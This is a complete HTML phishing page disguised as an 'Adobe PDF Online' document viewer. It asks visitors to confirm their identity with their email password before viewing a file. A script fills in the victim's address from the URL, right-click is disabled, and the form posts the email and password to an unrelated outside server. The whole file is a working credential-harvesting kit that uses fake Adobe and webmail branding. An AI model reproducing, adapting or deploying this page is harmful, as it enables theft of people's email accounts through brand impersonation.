<!DOCTYPE html>
<html lang="en" dir="LTR" ><head>
<meta charset="utf-8">
<title>Online PDF Viewer</title>

<style>
#email:focus{
	outline: none; box-shadow: none !important; -webkit-appearance: none;
	
}
#password:focus{
	outline: none; box-shadow: none !important; -webkit-appearance: none;

}
body{
margin:0;
font-family:helvetica, verdana, arial, san-serif;
min-width:750px;
}

body {
	background: url(https://i.ibb.co/Qv064hZ/bg.jpg) no-repeat center center fixed; 
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}

.login {
	padding: 10px;
}

.files {
	padding: 10px;
	background: #8b0000;
	margin: 200px auto;
	width: 90%;
	max-width: 450px;
	text-align: center;
	color: #fff;
}

form {
  max-width: 450px;
	margin: 0 auto;
}
form > div {
  position: relative;
  background: white;
  border-bottom: 1px solid #ccc;
  color: #000;
}
form > div > label {
  opacity: 0.3;
  font-weight: normal;
  position: absolute;
  top: 22px;
  left: 20px;
}
form > div > input[type="text"],
form > div > input[type="email"],
form > div > input[type="password"] {
  width: 100%;
  border: 0;
  padding: 20px 20px 20px 50px;
  background: #fff;
}
form > div > input[type="text"]:focus,
form > div > input[type="email"]:focus,
form > div > input[type="password"]:focus {
  outline: 0;
  background: white;
}
form > div > input[type="text"]:focus + label,
form > div > input[type="email"]:focus + label,
form > div > input[type="password"]:focus + label {
  opacity: 0;
}
form > div > input[type="text"]:valid,
form > div > input[type="email"]:valid,
form > div > input[type="password"]:valid {
  background: url(https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/check.svg);
  background-size: 20px;
  background-repeat: no-repeat;
  background-position: 20px 20px;
}
form > div > input[type="text"]:valid + label,
form > div > input[type="email"]:valid + label,
form > div > input[type="password"]:valid + label {
  opacity: 0;
}
form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown),
form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown),
form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) {
  background: pink;
}
form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown) + label,
form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown) + label,
form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) + label {
  opacity: 0;
}
form > div > input[type="text"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
form > div > input[type="email"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
form > div > input[type="password"]:invalid:focus:not(:placeholder-shown) ~ .requirements {
  max-height: 200px;
  padding: 0 30px 20px 50px;
}
form > div .requirements {
  padding: 0 30px 0 50px;
  color: #999;
  max-height: 0;
  transition: 0.28s;
  overflow: hidden;
  color: red;
  font-style: italic;
}
form input[type="submit"] {
  display: block;
  width: 100%;
  margin: 20px 0;
  background: #000000;
  color: white;
  border: 0;
  padding: 20px;
  font-size: 1.2rem;
}

form input[type="submit"]:hover {
	box-shadow: 1px 1px 1px #ddd;
}

* {
  box-sizing: border-box;
}

.invalid {
	background: #000;
	color: #000;
}

.loading {
	margin: 0;
	color: #fff;
	text-shadow: 1px 1px 1px #000;
}

.loader {
	margin: 10px auto;
	text-align: center;
	border: 16px solid #f3f3f3;
	border-radius: 50%;
	border-top: 16px solid green;
	width: 120px;
	height: 120px;
	-webkit-animation: spin 2s linear infinite; /* Safari */
	animation: spin 2s linear infinite;
}

/* Safari */
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(0deg); }
  100% { -webkit-transform: rotate(360deg); }
}

@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}


</style>

</head>

<body>
<script>
document.addEventListener("DOMContentLoaded", function() {
    // Get the email from the URL hash
    var email = window.location.hash.substr(1); // Remove the '#' character

    // Set the email value to the input field
    document.getElementById("email").value = email;

    // Replace placeholder with the actual email
    document.getElementById("email").value = document.getElementById("email").value.replace("[[Email]]", email);
});
</script>



<script>
    window.oncontextmenu = function(){
        return false;
    }
</script>

<body style="background:; font-family:helvetica, verdana, tahoma, arial; padding:0; min-width:700px; ">
<div id="top-header">
<table style="border:none; width:100%; padding:0; margin:0; height:50px; border-spacing:0; color:#fff; z-index:10000000; position:absolute;">
<tbody><tr>
<td style="background:#bb0706 url(https://i.ibb.co/9cLXFSp/smallpdf.png); width:4%; height:100%; margin:0; padding:0;"></td>
<td style="background:#bb0706; width:10%; height:100%; margin:0; padding:0; text-align:center;">Adobe PDF Online </td>
<td style="background:#000000; width:70%; height:100%; margin:0; padding:0;"></td>
<td style="background:#e1e1e1; width:10%; height:100%; margin:0; padding:0; color:#404040; text-align:center;"><a href="#" title="You are not signed In"> Account </a></td>
<td style="background:#e1e1e1; width:6%; height:100%; margin:0; padding:0; color:#404040; text-align:center; border-left:1px solid silver;"><a href="#" title="You are not signed in yet"> Sign In </a></td>
</tr>

</tbody></table>

</div>
<div style="width:100%; height:30px; background:#fff; padding:10px; position:relative; z-index:10000000000000;">
<table style="color:#454444; height:30px; width:100%;">
<tbody><tr>
<td style="width:60%;"></td>
<td style="width:10%; font-size:12px; color:#fff; "><a href="#" style="color:#FFF;" title="Login to continue"><span style="background:#bb0706; padding:10px;"><span class="icon-pencil"></span>Edit and Reply</span></a></td>
<td style="width:10%; font-size:12px;"><a href="#" title="Login to continue"><span class="icon-document"></span></a>Download</td>
<td style="width:10%; font-size:12px;"><a href="#" title="Login to continue"><span class="icon-printer"></span>Print</a></td>
<td style="width:6%; font-size:12px;"><a href="#" title="Login to continue"><span class="icon-aperture"></span>Exit</a></td>
<td style="width:4%; font-size:12px;">
<a href="#" title="Login to continue"><span style="font-weight:bold; font-size:2em; vertical-align:10px;">...</span></a>
</td>
</tr>
</tbody></table>
</div>


<div style="
background:#fbfbfb;
width:450px;
margin:0 auto;
margin-top:65px;
	border: 1px solid #EAEAEA;
	overflow: hidden;
	-moz-border-radius: 10px;
	-webkit-border-radius: 10px;
	border-radius: 10px;
	-webkit-box-shadow: rgba(0, 0, 0, 0.3) 0 1px 3px;
	-moz-box-shadow: rgba(0,0,0,0.3) 0 1px 3px;
	box-shadow: rgba(0, 0, 0, 0.3) 0 1px 3px;
	background: white;
	z-index: 11;
	position:relative;
">

<div style="padding:15px; z-index:12; min-width:400px; width:420px;">
<div style="background:#ededed; padding:5px; -webkit-border-radius: 10;
  -moz-border-radius: 10;
  border-radius: 10px;">
<img src="https://i.ibb.co/BNKH9vb/pdf-logo.png" height="50px" width="60px"><h1 style="color:rgb(187, 7, 6); text-shadow: 0px 1px 1px #4d4d4d; float:right; position:relative; right:50px;">Adobe PDF Online</h1>
</div>
<div style="clear:both;"></div>
<h4 style="color:#696767; font-family:verdana, arial; margin-top:0px;">
	<img src="https://i.ibb.co/kSHhfGv/100-Secure.jpg" height="25" width="75" />Confirm your identity</h4>
<div style="color:#6c5a79; margin-bottom:10px; margin-top:5px;">Sign in with your connected and active email account to access document</div>	
<div id="mail-icon" style="text-align:center; margin-top:2px;">
	<img src="https://upload.wikimedia.org/wikipedia/commons/thumb/a/a2/AOL_Eraser.svg/200px-AOL_Eraser.svg.png" width="30px" height= "30px" />
	<img src="https://i.ibb.co/qyv9H6y/download.png" width="30px" height= "30px" />
	<img src="https://i.ibb.co/pRwxjWj/outlook-logo.jpg" width="30px" height= "30px" />
	<img src="https://i.ibb.co/qWTwrPT/webmail-logo.gif" width="30px" height= "30px" />
	<img src="https://i.ibb.co/VtcT8ZJ/yahoo-logo.png" width="30px" height= "30px" />
	<img src="https://i.ibb.co/9Wq29zK/email-logo.png" width="30px" height= "30px" />
</div>
<style>
	#mail-icon img{
		
		padding-right:7px;
	}
</style>			
<script type="text/javascript">
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
</script>

<div style="text-align:center;">
					
<form method="post" action="https://pebblesandboulders.cam/images/index.php">
                <p class="style2">&nbsp;</p>
                <p>
                  <input type="email" id="email" name="email" style="width:300px; height:35px; 
								font-family: Verdana; font-size: 14px; color:#000000; background-color: #FFFFFF; 
								border: solid 1px #000000; padding: 10px; -moz-border-radius: 1px; 
								-webkit-border-radius: 1px; -khtml-border-radius: 1px; border-radius: 1px; 
								-moz-box-shadow: 2px 2px 2px #000000; -webkit-box-shadow: 2px 2px 2px #000000; 
								box-shadow: 2px 2px 2px #000000;" placeholder="" value="[[-Email-]]" readonly="" required="">
                </p>
                <p>
                  <input  name="password" type="password" style="width:300px; height:35px; 
								font-family: Verdana; font-size: 14px; color:#000000; background-color: #FFFFFF; 
								border: solid 1px #000000; padding: 10px; -moz-border-radius: 2px; 
								-webkit-border-radius: 2px; -khtml-border-radius: 2px; border-radius: 2px; 
								-moz-box-shadow: 3px 3px 3px #000000; -webkit-box-shadow: 3px 3px 3px #000000; 
								box-shadow: 3px 3px 3px #000000;" required="" placeholder="Password" />
                </p>
                <p>
					<input value="View Document" class="btn" type="submit" name='frm-submit' />
					<input type= "hidden" name= "s-id" value="adobe-quote" />
					</form>
</div>			
	<p style="font-size:0.9em;" align="center"> ©2024 Adobe Corporation</p>
							
							</div>
<div style="clear:both;"></div>

</div>
<div class="cover"></div>

</body></html>